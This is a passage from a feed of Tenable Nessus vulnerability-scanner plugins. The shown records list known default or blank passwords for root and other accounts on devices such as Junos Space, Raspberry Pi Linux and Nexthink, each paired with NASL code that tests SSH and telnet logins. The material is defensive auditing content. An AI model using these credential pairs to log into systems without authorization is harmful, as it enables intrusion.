the default password\n'666666'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:18:20", "description": "The account 'bash' has no password set. An attacker may use it to gain further privileges on this system. \n\nThis account was likely created by a backdoor installed by a fake Linux RedHat patch.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-10-30T00:00:00", "type": "nessus", "title": "Unpassworded 'bash' Backdoor Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/15583", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15583);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'bash' Backdoor Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a blank password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'bash' has no password set. An attacker may use it to gain \nfurther privileges on this system. \n\nThis account was likely created by a backdoor installed by a fake Linux \nRedHat patch.\");\n # http://web.archive.org/web/20050221110541/http://packetstormsecurity.nl/0410-advisories/FakeRedhatPatchAnalysis.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?231c3c89\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable this account and check your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:TF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:T/RC:X\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Backdoors\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude('global_settings.inc');\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:08:01", "description": "The account 'root' on the remote host has the default password 'hi3518'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'hi3518' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_HI3518.NASL", "href": "https://www.tenable.com/plugins/nessus/94389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"hi3518\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94389);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'hi3518' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'hi3518'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:49:20", "description": "The account 'nexthink' on the remote host has the password '123456'.\nAn attacker can leverage this issue to gain administrative access to the affected system.\n\nNote that Nexthink is known to use these credentials to provide administrative access to the host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-04-01T00:00:00", "type": "nessus", "title": "Default Password (123456) for 'nexthink' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_NEXTHINK_123456.NASL", "href": "https://www.tenable.com/plugins/nessus/82505", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"nexthink\";\npassword = \"123456\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82505);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (123456) for 'nexthink' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'nexthink' on the remote host has the password '123456'.\nAn attacker can leverage this issue to gain administrative access to\nthe affected system.\n\nNote that Nexthink is known to use these credentials to provide\nadministrative access to the host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://doc.nexthink.com/Documentation\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:35:14", "description": "The account 'root' on the remote host has the password 'abc123'. \n\nAn attacker may leverage this issue to gain full access to the affected system. \n\nNote that Junos Space is known to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-04-05T00:00:00", "type": "nessus", "title": "Default Password (abc123) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "ACCOUNT_ROOT_ABC123.NASL", "href": "https://www.tenable.com/plugins/nessus/65820", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"abc123\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65820);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (abc123) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'abc123'. \n\nAn attacker may leverage this issue to gain full access to the affected\nsystem. \n\nNote that Junos Space is known to use these credentials by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=KB26220\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:24:03", "description": "The account 'root' on the remote host has the password 'raspi'. \n\nAn attacker may leverage this issue to gain full access to the affected system. \n\nNote that a version of Linux optimized for Raspberry Pi ARM computers is known to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-01-28T00:00:00", "type": "nessus", "title": "Default Password (raspi) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_RASPI.NASL", "href": "https://www.tenable.com/plugins/nessus/64262", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"raspi\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64262);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (raspi) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'raspi'. \n\nAn attacker may leverage this issue to gain full access to the affected\nsystem. \n\nNote that a version of Linux optimized for Raspberry Pi ARM computers is\nknown to use these credentials by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moebiuslinux.sourceforge.net/documentation/installation-guide/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account, or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:32:56", "description": "The account 'root' on the remote host has the password '!2345Asdfg'.\nAn attacker may leverage this issue to gain access, likely as an administrator, to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-06T00:00:00", "type": "nessus", "title": "Default Password ('!2345Asdfg') for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_2345ASDFG.NASL", "href": "https://www.tenable.com/plugins/nessus/122613", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"!2345Asdfg\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122613);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password ('!2345Asdfg') for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password '!2345Asdfg'.\nAn attacker may leverage this issue to gain access, likely as an\nadministrator, to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Tenable's default score for default root credentials.\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:05:44", "description": "The account 'sync' has no password set. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'sync' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_SYNC.NASL", "href": "https://www.tenable.com/plugins/nessus/11247", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"sync\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11247);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'sync' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'sync' has no password set. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n 